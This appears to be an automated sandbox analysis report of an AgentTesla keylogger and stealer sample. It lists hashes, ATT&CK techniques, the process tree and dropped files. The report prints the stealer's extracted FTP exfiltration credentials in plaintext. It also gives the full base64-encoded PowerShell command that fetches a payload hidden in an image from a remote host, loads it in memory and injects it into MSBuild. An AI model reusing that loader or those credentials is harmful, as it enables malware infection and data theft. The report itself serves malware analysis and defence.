agenttesla | 2751cfc23b245638cab026862d10e575c537c13644696556274f7114c758840a

Analysis

max time kernel
148s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29/01/2025, 01:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2751cfc23b245638cab026862d10e575c537c13644696556274f7114c758840a.ps1
Size

1KB
MD5

0a03773457f7513861c5afa028f5f5d1
SHA1

d4797df5db25241ea55e6c3926610b146dbb24c1
SHA256

2751cfc23b245638cab026862d10e575c537c13644696556274f7114c758840a
SHA512

44a33cf835fc3188c96f220054769b00d895f8e188b118534d6d78236a25f51862d94cfab9a0705abdb7ba8d8630f4739951d51c1b8c1e59d8ffbce78b025b8c

Score

10^/10

agenttesla discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.siscop.com.co
Port:
21
Username:
[email protected]
Password:
+5s48Ia2&-(t

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Agenttesla family
agenttesla

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	4816	powershell.exe
18	4940	powershell.exe
20	4940	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4816	powershell.exe
4940	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4940 set thread context of 4028	4940	powershell.exe	88

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4816	powershell.exe
4816	powershell.exe
4940	powershell.exe
4940	powershell.exe
4028	MSBuild.exe
4028	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4816	powershell.exe
Token: SeDebugPrivilege	4940	powershell.exe
Token: SeDebugPrivilege	4028	MSBuild.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4816 wrote to memory of 4352	4816	powershell.exe	83
PID 4816 wrote to memory of 4352	4816	powershell.exe	83
PID 4352 wrote to memory of 2880	4352	csc.exe	84
PID 4352 wrote to memory of 2880	4352	csc.exe	84
PID 4816 wrote to memory of 60	4816	powershell.exe	85
PID 4816 wrote to memory of 60	4816	powershell.exe	85
PID 60 wrote to memory of 4940	60	WScript.exe	86
PID 60 wrote to memory of 4940	60	WScript.exe	86
PID 4940 wrote to memory of 4028	4940	powershell.exe	88
PID 4940 wrote to memory of 4028	4940	powershell.exe	88
PID 4940 wrote to memory of 4028	4940	powershell.exe	88
PID 4940 wrote to memory of 4028	4940	powershell.exe	88
PID 4940 wrote to memory of 4028	4940	powershell.exe	88
PID 4940 wrote to memory of 4028	4940	powershell.exe	88
PID 4940 wrote to memory of 4028	4940	powershell.exe	88
PID 4940 wrote to memory of 4028	4940	powershell.exe	88

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\2751cfc23b245638cab026862d10e575c537c13644696556274f7114c758840a.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4816
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1qgg1cfn\1qgg1cfn.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4352
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1CE.tmp" "c:\Users\Admin\AppData\Local\Temp\1qgg1cfn\CSCD3C5705B5394486088BFA3507C63437.TMP"
    3⤵
    PID:2880
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sweetnessgoodformilkandsweetness.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:60
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AMwAzADQAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAeAB4AHgAcABwAHAAcAByAG8AYwBzAGkAcwAvADkAMgAyAC4ANQA5AC4AMwAuADIAOQAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABhAHgAdwB1AGEANgAzAHkALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMANwA2ADkANgAxADcAMQAvAGgAZQBrAGUAMgBwAG0AdABlAHUAdwA4AHMAcQBzAHAAbABoAGsAbAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcATQBTAEIAdQBpAGwAZAAnACwAJwBmAGEAbABzAGUAJwApACkA')) | Invoke-Expression"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4940
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e0e053992acb41d6f94825182659c729

SHA1
092ba89c8457cf64cad93f6cb5f924d42eafa492

SHA256
caa07d4a6cb0256d54fc840e08f400d391787ea2bbb64a507772af48fe043a74

SHA512
58a0c29a42d75c1008112407d05f82b6578193fcfcf16f79545d5c08bfb427c0a11b4f59f0372f0e3599770fc59fd23de44bcec77e946d03e99491ac72617376

Download Submit
C:\Users\Admin\AppData\Local\Temp\1qgg1cfn\1qgg1cfn.dll

Filesize
3KB

MD5
1ca489b3336c01eb467a82d774984444

SHA1
01f573b5ac0248cb8233de18a431e3f9dcaa9b0f

SHA256
3bace8a8ebb4c99e7c559cd93a890637e987881b9eddac93ac9cdb6751b85326

SHA512
ca43efa06cc19b59bced27ceec3717f321347bf2be990c0150e74fdcf80943be9c6eca079dec8b627c9e7767e6c78c995b13554d2955424bd68f5955f2fc508a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA1CE.tmp

Filesize
1KB

MD5
9c4d0b8ad926c427f1ebc6d5ddf1b84f

SHA1
a07d072318e01adf003336de86896e323295e37f

SHA256
cb3e17345e569a789e652292df74d3e566aa6f3f4d82ae3fe0691ef3466fadac

SHA512
8cba6256939fc1b0fd6a0565b48f559f7aaf584b6d19c1917d5853c2dedb72a84bd1db0bbcf96a5c3e721f75340765f0c5a3905a188d55fedecb7e2d6095348a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4atyip3h.3bu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\sweetnessgoodformilkandsweetness.vbs

Filesize
212KB

MD5
a83ab6160f8b81c477554fa0a525af7a

SHA1
78092735fba37245ba6dbe825797b394afab9600

SHA256
16e8d67f35501bb8cd8b97d525e9cec94c016a823d722e04e043d535375f8b5c

SHA512
ec55a422d53a07d014955dfb43c7889732d1f9652666f6886ed8b54d287b4e2f7def4d596dd29981032d4782b81f181f0d88983e5764a9aed8420b8c6ad5ee3a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1qgg1cfn\1qgg1cfn.0.cs

Filesize
479B

MD5
3cafbfc34807b6dcc444198d49a41310

SHA1
7c8b63188b6d218abc99dfe6fd92cdc73461df20

SHA256
aa84f7f260d5403f852d166803cafaef04bc46e0ba419050bfe4111b09f8c73f

SHA512
731a56b1ff679a66acb8a523de0ec26ce27aac1b93a0cd84e5c4de6f66ee89f85cafb118dd8feeae95e04d0d430829190690114b8e73083188814e307ba2cb27

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1qgg1cfn\1qgg1cfn.cmdline

Filesize
369B

MD5
4140676dd7a442d8470b634cb50c3844

SHA1
4f4d2291ac64165d318c10096737442ef51493ba

SHA256
797d86d71559a68392ff1ad1c6943bca2c2d3ec792728fc08862278865e55444

SHA512
64f8374e48f233ec6b7c617de3810e03ef62194b9ab68963fca316d02e16ba52fe5882ac6fcfad48df42dca962c27185d91a7e5c8bca57e43b94b9e0a26c0c0d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1qgg1cfn\CSCD3C5705B5394486088BFA3507C63437.TMP

Filesize
652B

MD5
2756b572dec68809a4e58e939a98df8d

SHA1
53f2f5ef44531aee7754245de445ded57f216c18

SHA256
0db47c43aa100dd026bcfe6cef2a62ee9d3b0960ca707759ca16e64707739d25

SHA512
3a6661211da7deca70a2c92d9592aed934b763beb6dbd4ce1cf9c06f166bb86825740e07c6b27f3ea69295f619c9ca58ff9238d48d4999cd19c34cece299d6a0

Download Submit
memory/4028-47-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/4028-55-0x00000000069F0000-0x00000000069FA000-memory.dmp

Filesize
40KB

Download
memory/4028-54-0x0000000006A60000-0x0000000006AF2000-memory.dmp

Filesize
584KB

Download
memory/4028-53-0x0000000006970000-0x00000000069C0000-memory.dmp

Filesize
320KB

Download
memory/4028-52-0x0000000005810000-0x0000000005876000-memory.dmp

Filesize
408KB

Download
memory/4028-51-0x0000000005D50000-0x00000000062F4000-memory.dmp

Filesize
5.6MB

Download
memory/4816-10-0x00000287ED970000-0x00000287ED992000-memory.dmp

Filesize
136KB

Download
memory/4816-11-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/4816-44-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/4816-12-0x00007FF9024F0000-0x00007FF902FB1000-memory.dmp

Filesize
10.8MB

Download
memory/4816-0-0x00007FF9024F3000-0x00007FF9024F5000-memory.dmp

Filesize
8KB

Download
memory/4816-25-0x00000287ED8B0000-0x00000287ED8B8000-memory.dmp

Filesize
32KB

Download
memory/4940-46-0x000002A1774C0000-0x000002A1774C6000-memory.dmp

Filesize
24KB

Download
memory/4940-45-0x000002A1773B0000-0x000002A1773C4000-memory.dmp

Filesize
80KB

Download